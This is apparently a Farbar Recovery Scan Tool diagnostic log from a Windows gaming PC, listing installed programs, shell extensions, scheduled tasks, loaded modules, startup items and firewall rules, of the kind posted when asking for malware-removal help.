NCSOFT Game Launcher (HKLM-x32\...\NCLauncher_NCWest) (Version:  - NCSOFT)
Nexus Mod Manager (HKLM\...\6af12c54-643b-4752-87d0-8335503010de_is1) (Version: 0.63.14 - Black Tree Gaming)
Notepad++ (HKLM-x32\...\Notepad++) (Version: 7 - Notepad++ Team)
NV:MP (HKLM-x32\...\{3FAA6664-C4C1-4754-8D5F-2B7C621E9297}) (Version: 1.0 - NV:MP Team)
NVIDIA 3D Vision Controller Driver 369.04 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.NVIRUSB) (Version: 369.04 - NVIDIA Corporation)
NVIDIA 3D Vision Driver 388.59 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.3DVision) (Version: 388.59 - NVIDIA Corporation)
NVIDIA Graphics Driver 388.59 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.Driver) (Version: 388.59 - NVIDIA Corporation)
NVIDIA HD Audio Driver 1.3.35.1 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_HDAudio.Driver) (Version: 1.3.35.1 - NVIDIA Corporation)
NVIDIA Photoshop Plug-ins 64 bit (HKLM-x32\...\{5E386C5B-CDE7-435A-B5C9-EC73A1B0553A}) (Version: 8.50 - )
NVIDIA PhysX System Software 9.17.0524 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.PhysX) (Version: 9.17.0524 - NVIDIA Corporation)
OBS Studio (HKLM-x32\...\OBS Studio) (Version: 19.0.3 - OBS Project)
Opera Stable 49.0.2725.64 (HKLM-x32\...\Opera 49.0.2725.64) (Version: 49.0.2725.64 - Opera Software)
Origin (HKLM-x32\...\Origin) (Version: 10.5.8.11002 - Electronic Arts, Inc.)
Ozone Neon 3K Driver (HKLM-x32\...\{FA367E43-1B7B-45B2-80DC-8FEF62F4A929}) (Version: 1.0 - Ozone Gaming)
PC Remote (HKLM-x32\...\{C934DF74-D0D9-445C-90AA-34012A04E11D}) (Version: 3.51 - PC Remote)
Peace (HKLM\...\Peace) (Version: 1.4.2.3 - P.E. Verbeek)
Planetbase (HKLM-x32\...\1351624781_is1) (Version: 1.2.3 - GOG.com)
Plants vs. Zombies™ (HKLM-x32\...\{5E6536C2-E79A-49CF-83EA-817AD81F9FC8}) (Version: 1.2.0.1093 - Electronic Arts, Inc.)
PunkBuster Services (HKLM-x32\...\PunkBusterSvc) (Version: 0.991 - Even Balance, Inc.)
qBittorrent 3.3.10 (HKLM-x32\...\qBittorrent) (Version: 3.3.10 - The qBittorrent project)
QuickSFV (Remove only) (HKLM\...\QuickSFV) (Version:  - )
Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.8036 - Realtek Semiconductor Corp.)
Renesas Electronics USB 3.0 Host Controller Driver (HKLM-x32\...\{5442DAB8-7177-49E1-8B22-09A049EA5996}) (Version: 2.0.32.0 - Renesas Electronics Corporation) Hidden
Renesas Electronics USB 3.0 Host Controller Driver (HKLM-x32\...\InstallShield_{5442DAB8-7177-49E1-8B22-09A049EA5996}) (Version: 2.0.32.0 - Renesas Electronics Corporation)
Samsung Magician (HKLM-x32\...\{29AE3F9F-7158-4ca7-B1ED-28A73ECDB215}_is1) (Version: 5.0.0.790 - Samsung Electronics)
ScpToolkit (HKLM\...\{1EA84ED4-28D4-4836-BF8B-0E31BF1704C5}) (Version: 1.7.277.16103 - Nefarius Software Solutions)
SD Card Formatter (HKLM-x32\...\{10C16E01-F739-4093-89A7-E570589FA0F6}) (Version: 5.0.0 - SD Association)
Sid Meier's Civilization V (HKLM-x32\...\steam app 8930) (Version:  - 2K Games, Inc.)
Skype Web Plugin (HKLM-x32\...\{EB96DF8B-65A7-4E72-BFB1-38DB36870D16}) (Version: 7.32.6.278 - Skype Technologies S.A.)
Sony Mobile Update Engine (HKLM-x32\...\Update Engine) (Version: 2.17.2.201702091525 - Sony Mobile Communications Inc.)
Sophos Management Communications System (HKLM-x32\...\{2C14E1A2-C4EB-466E-8374-81286D723D3A}) (Version: 4.3.2.1 - Sophos Limited)
SpeedFan (remove only) (HKLM-x32\...\SpeedFan) (Version:  - )
Spore (HKLM-x32\...\Spore_R.G. Mechanics_is1) (Version:  - R.G. Mechanics, markfiter)
Spore™ (HKLM-x32\...\{4BDCC41C-FFE7-40a4-BCB6-B558916868F7}) (Version: 1.7.0.0 - Electronic Arts)
Star Wars The Old Republic (HKLM-x32\...\swtor_swtor) (Version: 13.0.0.13 - Bioware/EA)
Star Wars: The Old Republic (HKLM-x32\...\{3B11D799-48E0-48ED-BFD7-EA655676D8BB}) (Version: 1.00 - Electronic Arts, Inc.)
Steam (HKLM-x32\...\Steam) (Version: 2.10.91.91 - Valve Corporation)
TAP-Windows 9.21.2 (HKLM\...\TAP-Windows) (Version: 9.21.2 - )
TeamSpeak 3 Client (HKLM\...\TeamSpeak 3 Client) (Version: 3.1.4 - TeamSpeak Systems GmbH)
TeamViewer 12 (HKLM-x32\...\TeamViewer) (Version: 12.0.83369 - TeamViewer)
TechPowerUp GPU-Z (HKLM-x32\...\TechPowerUp GPU-Z) (Version:  - TechPowerUp)
The Elder Scrolls Online (HKLM-x32\...\The Elder Scrolls Online) (Version: 1.0.0.0 - Zenimax Online Studios)
The Klub 17 (HKU\S-1-5-21-2661263523-112610016-3866790350-1000\...\Klub-7) (Version: 7.5.0 - Team WRK17)
Tom Clancy's Rainbow Six Siege (HKLM-x32\...\Uplay Install 635) (Version:  - Ubisoft Montreal)
Tunngle (HKLM-x32\...\Tunngle_is1) (Version: 5.8.7 - Tunngle.net GmbH)
Uplay (HKLM-x32\...\Uplay) (Version: 26.0 - Ubisoft)
VirusTotal Uploader 2.2 (HKLM-x32\...\VTUploader) (Version:  - )
VLC media player (HKLM-x32\...\VLC media player) (Version: 2.2.6 - VideoLAN)
Vulkan Run Time Libraries 1.0.61.0 (HKLM\...\VulkanRT1.0.61.0) (Version: 1.0.61.0 - LunarG, Inc.) Hidden
Warhammer End Times Vermintide [v.1.4.3] (HKLM-x32\...\{WETV-6B52-2B42-48D3-6FDF3A861253}_is1) (Version: 1.4.3 - )
WinRAR 5.40 (64-bit) (HKLM\...\WinRAR archiver) (Version: 5.40.0 - win.rar GmbH)
Xperia Companion (HKLM-x32\...\{62FC2304-E50B-4476-8AB0-8DE598A57076}) (Version: 1.5.3.0 - Sony) Hidden
Xperia Companion (HKLM-x32\...\{8d53ad63-24f0-4f9e-bb4f-53c7d69a67d6}) (Version: 1.5.3.0 - Sony)
Xperia Companion Service (HKLM\...\{1BF08694-7353-47AD-B618-6A619DC2DD2F}) (Version: 1.5.3.0 - Sony) Hidden
Yet Another (remote) Process Monitor 2.4.2 (HKLM-x32\...\{EFD64A45-12DC-4429-853F-10B453B90F0A}_is1) (Version: 2.4.2 - v_k softwares)
 
==================== Custom CLSID (Whitelisted): ==========================
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
CustomCLSID: HKU\S-1-5-21-2661263523-112610016-3866790350-1000_Classes\CLSID\{41052F6E-3662-4584-BCD3-77BCCAAE8470}\InprocServer32 -> C:\Users\Sblck\AppData\Local\SkypePlugin\7.32.6.278\GatewayActiveX-x64.dll (Skype Technologies S.A.)
CustomCLSID: HKU\S-1-5-21-2661263523-112610016-3866790350-1000_Classes\CLSID\{60813F68-E9F7-4B3C-80B4-A76A66211660}\localserver32 -> C:\Users\Sblck\AppData\Local\SkypePlugin\7.32.6.278\GatewayVersion-x64.exe (Skype Technologies S.A.)
CustomCLSID: HKU\S-1-5-21-2661263523-112610016-3866790350-1000_Classes\CLSID\{CBF9CD8C-2714-4F36-B76A-43E6C7547BC2}\localserver32 -> C:\Users\Sblck\AppData\Local\SkypePlugin\7.32.6.278\EdgeCalling.exe (Skype Technologies S.A.)
CustomCLSID: HKU\S-1-5-21-2661263523-112610016-3866790350-1000_Classes\CLSID\{e8c77137-e224-5791-b6e9-ff0305797a13}\InprocServer32 -> C:\Program Files (x86)\Adobe\Adobe Creative Cloud\Utils\npAdobeAAMDetect64.dll (Adobe Systems)
ShellIconOverlayIdentifiers: [ MEGA (Pending)] -> {056D528D-CE28-4194-9BA3-BA2E9197FF8C} => C:\Users\Sblck\AppData\Local\MEGAsync\ShellExtX64.dll -> No File
ShellIconOverlayIdentifiers: [ MEGA (Synced)] -> {05B38830-F4E9-4329-978B-1DD28605D202} => C:\Users\Sblck\AppData\Local\MEGAsync\ShellExtX64.dll -> No File
ShellIconOverlayIdentifiers: [ MEGA (Syncing)] -> {0596C850-7BDD-4C9D-AFDF-873BE6890637} => C:\Users\Sblck\AppData\Local\MEGAsync\ShellExtX64.dll -> No File
ShellIconOverlayIdentifiers: [ AccExtIco1] -> {AB9CF9F8-8A96-4F9D-BF21-CE85714C3A47} => C:\Program Files (x86)\Common Files\Adobe\CoreSyncExtension\CoreSync_x64.dll [2017-09-26] ()
ShellIconOverlayIdentifiers: [ AccExtIco2] -> {853B7E05-C47D-4985-909A-D0DC5C6D7303} => C:\Program Files (x86)\Common Files\Adobe\CoreSyncExtension\CoreSync_x64.dll [2017-09-26] ()
ShellIconOverlayIdentifiers: [ AccExtIco3] -> {42D38F2E-98E9-4382-B546-E24E4D6D04BB} => C:\Program Files (x86)\Common Files\Adobe\CoreSyncExtension\CoreSync_x64.dll [2017-09-26] ()
ShellIconOverlayIdentifiers-x32: [ MEGA (Pending)] -> {056D528D-CE28-4194-9BA3-BA2E9197FF8C} => C:\Users\Sblck\AppData\Local\MEGAsync\ShellExtX64.dll -> No File
ShellIconOverlayIdentifiers-x32: [ MEGA (Synced)] -> {05B38830-F4E9-4329-978B-1DD28605D202} => C:\Users\Sblck\AppData\Local\MEGAsync\ShellExtX64.dll -> No File
ShellIconOverlayIdentifiers-x32: [ MEGA (Syncing)] -> {0596C850-7BDD-4C9D-AFDF-873BE6890637} => C:\Users\Sblck\AppData\Local\MEGAsync\ShellExtX64.dll -> No File
ContextMenuHandlers1: [7-Zip] -> {23170F69-40C1-278A-1000-000100020000} => C:\Program Files\7-Zip\7-zip.dll [2017-04-29] (Igor Pavlov)
ContextMenuHandlers1: [AccExt] -> {2A118EB5-5797-4F5E-8B3D-F4ECBA3C98E4} => C:\Program Files (x86)\Common Files\Adobe\CoreSyncExtension\CoreSync_x64.dll [2017-09-26] ()
ContextMenuHandlers1: [ANotepad++64] -> {B298D29A-A6ED-11DE-BA8C-A68E55D89593} => C:\Program Files (x86)\Notepad++\NppShell_06.dll [2016-09-21] ()
ContextMenuHandlers1: [ESET Smart Security - Context Menu Shell Extension] -> {B089FE88-FB52-11D3-BDF1-0050DA34150D} => C:\Program Files\ESET\ESET NOD32 Antivirus\shellExt.dll [2016-12-14] (ESET)
ContextMenuHandlers1: [MEGA (Context menu)] -> {0229E5E7-09E9-45CF-9228-0228EC7D5F17} => C:\Users\Sblck\AppData\Local\MEGAsync\ShellExtX64.dll -> No File
ContextMenuHandlers1: [QuickSFV Shell Extension] -> {906b0e6e-61ce-11d3-8ee2-0060080a7242} => C:\Program Files\QuickSFV\QSFVShll.dll [2017-09-25] (Mercedes)
ContextMenuHandlers1: [WinRAR] -> {B41DB860-64E4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext.dll [2016-08-14] (Alexander Roshal)
ContextMenuHandlers1-x32: [WinRAR32] -> {B41DB860-8EE4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext32.dll [2016-08-14] (Alexander Roshal)
ContextMenuHandlers2: [ESET Smart Security - Context Menu Shell Extension] -> {B089FE88-FB52-11D3-BDF1-0050DA34150D} => C:\Program Files\ESET\ESET NOD32 Antivirus\shellExt.dll [2016-12-14] (ESET)
ContextMenuHandlers2: [MEGA (Context menu)] -> {0229E5E7-09E9-45CF-9228-0228EC7D5F17} => C:\Users\Sblck\AppData\Local\MEGAsync\ShellExtX64.dll -> No File
ContextMenuHandlers3: [MBAMShlExt] -> {57CE581A-0CB6-4266-9CA0-19364C90A0B3} => C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamext.dll [2016-03-10] (Malwarebytes)
ContextMenuHandlers3: [MEGA (Context menu)] -> {0229E5E7-09E9-45CF-9228-0228EC7D5F17} => C:\Users\Sblck\AppData\Local\MEGAsync\ShellExtX64.dll -> No File
ContextMenuHandlers4: [7-Zip] -> {23170F69-40C1-278A-1000-000100020000} => C:\Program Files\7-Zip\7-zip.dll [2017-04-29] (Igor Pavlov)
ContextMenuHandlers4: [MEGA (Context menu)] -> {0229E5E7-09E9-45CF-9228-0228EC7D5F17} => C:\Users\Sblck\AppData\Local\MEGAsync\ShellExtX64.dll -> No File
ContextMenuHandlers4: [PowerISO] -> {967B2D40-8B7D-4127-9049-61EA0C2C6DCE} =>  -> No File
ContextMenuHandlers4: [QuickSFV Shell Extension] -> {906b0e6e-61ce-11d3-8ee2-0060080a7242} => C:\Program Files\QuickSFV\QSFVShll.dll [2017-09-25] (Mercedes)
ContextMenuHandlers5: [NvCplDesktopContext] -> {3D1975AF-48C6-4f8e-A182-BE0E08FA86A9} => C:\Windows\system32\nvshext.dll [2017-12-05] (NVIDIA Corporation)
ContextMenuHandlers6: [7-Zip] -> {23170F69-40C1-278A-1000-000100020000} => C:\Program Files\7-Zip\7-zip.dll [2017-04-29] (Igor Pavlov)
ContextMenuHandlers6: [AccExt] -> {2A118EB5-5797-4F5E-8B3D-F4ECBA3C98E4} => C:\Program Files (x86)\Common Files\Adobe\CoreSyncExtension\CoreSync_x64.dll [2017-09-26] ()
ContextMenuHandlers6: [ESET Smart Security - Context Menu Shell Extension] -> {B089FE88-FB52-11D3-BDF1-0050DA34150D} => C:\Program Files\ESET\ESET NOD32 Antivirus\shellExt.dll [2016-12-14] (ESET)
ContextMenuHandlers6: [MBAMShlExt] -> {57CE581A-0CB6-4266-9CA0-19364C90A0B3} => C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamext.dll [2016-03-10] (Malwarebytes)
ContextMenuHandlers6: [PowerISO] -> {967B2D40-8B7D-4127-9049-61EA0C2C6DCE} =>  -> No File
ContextMenuHandlers6: [WinRAR] -> {B41DB860-64E4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext.dll [2016-08-14] (Alexander Roshal)
ContextMenuHandlers6-x32: [WinRAR32] -> {B41DB860-8EE4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext32.dll [2016-08-14] (Alexander Roshal)
 
==================== Scheduled Tasks (Whitelisted) =============
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
Task: {0540CF0D-03F8-49C8-A1B9-7D52B023F7AE} - System32\Tasks\GyazoUpdateTaskMachine => C:\Program Files (x86)\Gyazo\GyazoUpdate.exe [2017-12-21] (Nota Inc.)
Task: {21D4E20E-BAD2-49D2-BD66-8CBC9CAD71E3} - System32\Tasks\MSIAfterburner => C:\Program Files (x86)\MSI Afterburner\MSIAfterburner.exe [2017-10-31] ()
Task: {4744DA1F-57CD-4A22-9415-F59CAE8CCF75} - System32\Tasks\Core Temp Autostart Sblck => D:\Programs\Core Temp\Core Temp.exe [2016-09-11] ()
Task: {50669B1B-11BA-4FF4-AE07-496DD9C8D39D} - System32\Tasks\Opera scheduled Autoupdate 1500706514 => C:\Program Files\Opera\launcher.exe [2017-12-18] (Opera Software)
Task: {50B2C331-4933-4083-BBC6-6F4135519816} - System32\Tasks\HPCustParticipation HP Deskjet 3520 series => C:\Program Files\HP\HP Deskjet 3520 series\Bin\HPCustPartic.exe [2012-10-17] (Hewlett-Packard Co.)
Task: {510ED6C8-2CC3-47C9-A69C-DFF6D6BB0CD1} - System32\Tasks\klcp_update => C:\Program Files (x86)\K-Lite Codec Pack\Tools\CodecTweakTool.exe [2017-06-06] ()
Task: {A5E12DDB-1FC8-4654-BB03-8AE61E4715BF} - System32\Tasks\{4F5304D5-3859-490D-8CFF-18EC617A72A0} => "c:\program files (x86)\google\chrome\application\chrome.exe" hxxps://ui.skype.com/ui/0/7.40.0.103/pp/abandoninstall?source=lightinstaller&page=tsMain
Task: {A6C93A3A-F882-4D17-9096-0E181298585A} - System32\Tasks\GyazoUpdateTaskMachineDaily => C:\Program Files (x86)\Gyazo\GyazoUpdate.exe [2017-12-21] (Nota Inc.)
Task: {AA0C1BC0-162D-4253-BC5C-D2F60B21DF56} - System32\Tasks\SpeedFan\SpeedFan => F:\Program Files (x86)\SpeedFan\speedfan.exe [2016-06-29] ()
Task: {ACEDE6E7-03B8-4979-9357-F08EE54B3FA5} - System32\Tasks\ScpUpdater => C:\Program Files\Nefarius Software Solutions\ScpToolkit\ScpUpdater.exe [2016-04-12] (Nefarius Software Solutions)
Task: {D3ABF47C-5762-4538-BAF2-55C4DDE525E4} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2016-09-27] (Google Inc.)
Task: {E0309C29-204E-4D05-A320-02144963A5DC} - System32\Tasks\Adobe Acrobat Update Task => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [2017-09-27] (Adobe Systems Incorporated)
Task: {F6176BD5-1805-4689-B510-FBDD6E1E8E07} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2016-09-27] (Google Inc.)
Task: {FDE43C44-0B6D-451D-88EE-A0A0D4184D90} - System32\Tasks\SamsungMagician => C:\Program Files (x86)\Samsung\Samsung Magician\SamsungMagician.exe [2016-11-23] (Samsung Electronics Co. Ltd.)
Task: {FEE7FAF7-F07E-47D7-A894-7A6E773D72FE} - System32\Tasks\Adobe Flash Player PPAPI Notifier => C:\Windows\SysWOW64\Macromed\Flash\FlashUtil32_26_0_0_131_pepper.exe
 
(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)
 
Task: C:\Windows\Tasks\ScpUpdater.job => C:\Program Files\Nefarius Software Solutions\ScpToolkit\ScpUpdater.exe
 
==================== Shortcuts & WMI ========================
 
(The entries could be listed to be restored or removed.)
 
 
==================== Loaded Modules (Whitelisted) ==============
 
2017-07-19 19:55 - 2017-07-19 19:55 - 000665088 _____ () C:\Program Files\EqualizerAPO\EqualizerAPO.dll
2015-11-22 20:05 - 2015-11-22 20:05 - 001530880 _____ () C:\Program Files\EqualizerAPO\libsndfile-1.dll
2017-07-08 10:52 - 2017-07-08 10:52 - 002983917 _____ () C:\Program Files\EqualizerAPO\libfftw3f-3.dll
2017-09-25 15:19 - 2017-09-25 15:19 - 000307712 _____ () C:\Windows\assembly\NativeImages_v4.0.30319_64\ReactiveSockets\a99a336b4eb0ae7e8899446dd105e2f0\ReactiveSockets.ni.dll
2014-05-02 11:52 - 2014-05-02 11:52 - 000599040 _____ () C:\Program Files\Nefarius Software Solutions\ScpToolkit\irrKlang\amd64\irrKlang.NET4.dll
2014-05-02 06:55 - 2014-05-02 06:55 - 000185344 _____ () C:\Program Files\Nefarius Software Solutions\ScpToolkit\irrKlang\amd64\ikpflac.dll
2014-05-02 06:05 - 2014-05-02 06:05 - 000173056 _____ () C:\Program Files\Nefarius Software Solutions\ScpToolkit\irrKlang\amd64\ikpmp3.dll
2017-09-13 13:01 - 2017-09-22 22:32 - 000076152 _____ () C:\Windows\SysWOW64\PnkBstrA.exe
2017-06-28 16:26 - 2017-10-31 06:07 - 000444008 _____ () C:\Program Files (x86)\RivaTuner Statistics Server\RTSSHooks64.dll
2017-09-26 02:52 - 2017-09-26 02:52 - 000491600 _____ () C:\Program Files (x86)\Common Files\Adobe\CoreSyncExtension\CoreSync_x64.dll
2016-09-21 20:16 - 2016-09-21 20:16 - 000230064 _____ () C:\Program Files (x86)\Notepad++\NppShell_06.dll
2017-10-31 09:05 - 2017-10-31 09:05 - 000722216 _____ () C:\Program Files (x86)\MSI Afterburner\MSIAfterburner.exe
2016-09-28 12:53 - 2016-09-11 09:19 - 000925160 _____ () D:\Programs\Core Temp\Core Temp.exe
2017-08-19 01:08 - 2017-11-23 19:14 - 001766376 _____ () F:\Games\SteamLibrary\steamapps\common\wallpaper_engine\wallpaper64.exe
2017-10-31 06:07 - 2017-10-31 06:07 - 000252008 _____ () C:\Program Files (x86)\RivaTuner Statistics Server\RTSS.exe
2017-10-31 06:07 - 2017-10-31 06:07 - 000035432 _____ () C:\Program Files (x86)\RivaTuner Statistics Server\EncoderServer.exe
2017-10-31 06:07 - 2017-10-31 06:07 - 000061032 _____ () C:\Program Files (x86)\RivaTuner Statistics Server\RTSSHooksLoader64.exe
2016-06-29 18:01 - 2016-06-29 18:01 - 008166536 _____ () F:\Program Files (x86)\SpeedFan\speedfan.exe
2017-10-29 20:01 - 2017-10-29 20:01 - 000071680 _____ () C:\Program Files (x86)\MSI Afterburner\RTMUI.dll
2017-10-29 20:00 - 2017-10-29 20:00 - 000056832 _____ () C:\Program Files (x86)\MSI Afterburner\RTFC.dll
2017-10-29 20:01 - 2017-10-29 20:01 - 000232448 _____ () C:\Program Files (x86)\MSI Afterburner\RTCore.dll
2017-10-29 20:01 - 2017-10-29 20:01 - 000357888 _____ () C:\Program Files (x86)\MSI Afterburner\RTUI.dll
2017-10-29 20:01 - 2017-10-29 20:01 - 000565760 _____ () C:\Program Files (x86)\MSI Afterburner\RTHAL.dll
2017-06-28 16:26 - 2017-10-31 06:07 - 000410728 _____ () C:\Program Files (x86)\RivaTuner Statistics Server\RTSSHooks.dll
2017-10-10 18:51 - 2017-10-10 18:51 - 000055808 _____ () C:\Program Files (x86)\RivaTuner Statistics Server\RTFC.dll
2017-10-10 18:52 - 2017-10-10 18:52 - 000353792 _____ () C:\Program Files (x86)\RivaTuner Statistics Server\RTUI.dll
2017-10-10 18:52 - 2017-10-10 18:52 - 000071680 _____ () C:\Program Files (x86)\RivaTuner Statistics Server\RTMUI.dll
2017-12-28 15:21 - 2017-12-28 15:33 - 000158720 _____ () C:\Users\Sblck\AppData\Local\Temp\sfareca00001.dll
2017-08-31 14:57 - 2017-12-28 15:33 - 000192512 _____ () C:\Users\Sblck\AppData\Local\Temp\sfamcc00001.dll
2017-09-25 11:59 - 2017-09-25 11:59 - 000172544 _____ () C:\Windows\assembly\NativeImages_v2.0.50727_32\IsdiInterop\d2fc11422bda66dae440cd5ca4a89143\IsdiInterop.ni.dll
2016-09-27 17:58 - 2011-04-29 23:28 - 000059904 _____ () C:\Program Files (x86)\Intel\Intel® Rapid Storage Technology\IsdiInterop.dll
 
==================== Alternate Data Streams (Whitelisted) =========
 
(If an entry is included in the fixlist, only the ADS will be removed.)
 
AlternateDataStreams: C:\Windows\SysWOW64\zlib.dll:DocumentSummaryInformation [63]
AlternateDataStreams: C:\Windows\SysWOW64\zlib.dll:SummaryInformation [63]
AlternateDataStreams: C:\Windows\SysWOW64\zlib.dll:{4c8cc155-6c1e-11d1-8e41-00c04fb9386d} [0]
 
==================== Safe Mode (Whitelisted) ===================
 
(If an entry is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)
 
 
==================== Association (Whitelisted) ===============
 
(If an entry is included in the fixlist, the registry item will be restored to default or removed.)
 
 
==================== Internet Explorer trusted/restricted ===============
 
(If an entry is included in the fixlist, it will be removed from the registry.)
 
IE restricted site: HKU\S-1-5-21-2661263523-112610016-3866790350-1000\...\phoenix-interactive.net -> phoenix-interactive.net
IE restricted site: HKU\S-1-5-21-2661263523-112610016-3866790350-1000\...\tunngle.biz -> tunngle.biz
 
==================== Hosts content: ===============================
 
(If needed Hosts: directive could be included in the fixlist to reset Hosts.)
 
2009-07-14 02:34 - 2017-04-23 01:25 - 000000834 _____ C:\Windows\system32\Drivers\etc\hosts
 
 
==================== Other Areas ============================
 
(Currently there is no automatic fix for this section.)
 
HKU\S-1-5-21-2661263523-112610016-3866790350-1000\Control Panel\Desktop\\Wallpaper -> C:\Users\Sblck\AppData\Roaming\Microsoft\Windows\Themes\TranscodedWallpaper.jpg
DNS Servers: 8.8.8.8 - 8.8.4.4
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 2) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
Windows Firewall is enabled.
 
==================== MSCONFIG/TASK MANAGER disabled items ==
 
MSCONFIG\Services: AdobeARMservice => 2
MSCONFIG\Services: AdobeUpdateService => 2
MSCONFIG\Services: AGSService => 2
MSCONFIG\Services: BEService => 3
MSCONFIG\Services: BstHdLogRotatorSvc => 3
MSCONFIG\Services: CG6Service => 3
MSCONFIG\Services: Disc Soft Lite Bus Service => 3
MSCONFIG\Services: gupdate => 2
MSCONFIG\Services: gupdatem => 3
MSCONFIG\Services: HiPatchService => 2
MSCONFIG\Services: Origin Client Service => 3
MSCONFIG\Services: Origin Web Helper Service => 2
MSCONFIG\Services: PAExec => 3
MSCONFIG\Services: rpcapd => 3
MSCONFIG\Services: SkypeUpdate => 2
MSCONFIG\Services: TeamViewer => 3
MSCONFIG\Services: TunngleService => 3
MSCONFIG\Services: XperiaCompanionService => 2
MSCONFIG\startupfolder: C:^Users^Sblck^AppData^Roaming^Microsoft^Windows^Start Menu^Programs^Startup^Equalizer APO Voicemeeter Client.lnk => C:\Windows\pss\Equalizer APO Voicemeeter Client.lnk.Startup
MSCONFIG\startupreg: Adobe Creative Cloud => "C:\Program Files (x86)\Adobe\Adobe Creative Cloud\ACC\Creative Cloud.exe" --showwindow=false --onOSstartup=true
MSCONFIG\startupreg: AdobeAAMUpdater-1.0 => "C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\UWA\UpdaterStartupUtility.exe"
MSCONFIG\startupreg: CCleaner Monitoring => "D:\Programs\Ccleaner\CCleaner64.exe" /MONITOR
MSCONFIG\startupreg: DAEMON Tools Lite Automount => "C:\Program Files\DAEMON Tools Lite\DTAgent.exe" -autorun
MSCONFIG\startupreg: dpinst => C:\Users\Sblck\AppData\Roaming\DIFX\dpinst.exe
MSCONFIG\startupreg: HP Deskjet 3520 series (NET) => "C:\Program Files\HP\HP Deskjet 3520 series\Bin\ScanToPCActivationApp.exe" -deviceID "CN389110ZR05SY:NW" -scfn "HP Deskjet 3520 series (NET)" -AutoStart 1
MSCONFIG\startupreg: NUSB3MON => "C:\Program Files (x86)\Renesas Electronics\USB 3.0 Host Controller Driver\Application\nusb3mon.exe"
MSCONFIG\startupreg: Ozone Neon 3K Driver => "C:\Program Files (x86)\Ozone Neon 3K Driver\OzoneMonitor.exe"
MSCONFIG\startupreg: PC Remote Server => C:\Program Files (x86)\PC Remote\PC Remote\PCRemote.exe /silent
MSCONFIG\startupreg: RESTART_STICKY_NOTES => C:\Windows\System32\StikyNot.exe
MSCONFIG\startupreg: Skype => "C:\Program Files (x86)\Skype\Phone\Skype.exe" /minimized /regrun
MSCONFIG\startupreg: SunJavaUpdateSched => "C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe"
MSCONFIG\startupreg: XperiaCompanionAgent => "C:\Program Files (x86)\Sony\Xperia Companion\XperiaCompanionAgent.exe"
MSCONFIG\startupreg: {31AC3B64-AB6C-4659-BB1A-EEDFBA9B98F7} => "D:\Downloads\LeagueofLegends_EUW_Installer_2016_05_13.exe" /cmdloc "HKCU\Software\Riot Games AiTemp\{31AC3B64-AB6C-4659-BB1A-EEDFBA9B98F7}"
 
==================== FirewallRules (Whitelisted) ===============
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
FirewallRules: [{A68EB209-C1D9-4E70-A12B-49D83309ECA9}] => (Allow) C:\Program Files (x86)\Steam\Steam.exe
FirewallRules: [{740E5CAB-6C9F-4A61-9471-AF1E79B5775E}] => (Allow) C:\Program Files (x86)\Steam\Steam.exe
FirewallRules: [{7B0F32E0-AFB8-4E65-B115-DFB97A2F6977}] => (Allow) D:\SteamLibrary HDD\steamapps\common\Left 4 Dead 2\left4dead2.exe
FirewallRules: [{81064ED7-49CC-4A04-B657-FBB3EF3AFCFE}] => (Allow) D:\SteamLibrary HDD\steamapps\common\Left 4 Dead 2\left4dead2.exe
FirewallRules: [{1C9A64F2-43BD-4E3A-8C0E-916FDDB8E1A1}] => (Allow) C:\Program Files (x86)\Tunngle\TnglCtrl.exe
FirewallRules: [{7556FDDC-FCB2-4AD2-8C3D-303E8F81418E}] => (Allow) C:\Program Files (x86)\Tunngle\TnglCtrl.exe
FirewallRules: [{1F15EEBD-B867-4D10-96BC-22C66FB45C1A}] => (Allow) C:\Program Files (x86)\Tunngle\Tunngle.exe
FirewallRules: [{A3C0AD4E-80D0-4E5B-8E79-0A4ACCEE7A2D}] => (Allow) C:\Program Files (x86)\Tunngle\Tunngle.exe
FirewallRules: [{B5814217-718E-4E53-A90C-CA0E3418EE8C}] => (Allow) LPort=27015
FirewallRules: [{F42F6481-7002-4B98-925C-5CAEC4CC8344}] => (Allow) LPort=27015
FirewallRules: [{C89C8666-90F0-47C7-A63A-E195512CC6ED}] => (Allow) LPort=7777
FirewallRules: [{A8506F51-9C08-449A-BC54-AA1F44F4A3A3}] => (Allow) LPort=7777
FirewallRules: [{15ACD813-5390-45CA-8A24-9F14F55631BC}] => (Allow) C:\Program Files\HP\HP Deskjet 3520 series\Bin\DeviceSetup.exe
FirewallRules: [{796342EF-0A9E-49F0-B704-38E5019CAF05}] => (Allow) C:\Program Files\HP\HP Deskjet 3520 series\Bin\HPNetworkCommunicator.exe
FirewallRules: [{D0C67DBF-17EB-4961-A0DD-8D245E56E6B3}] => (Allow) C:\Program Files\HP\HP Deskjet 3520 series\Bin\HPNetworkCommunicatorCom.exe
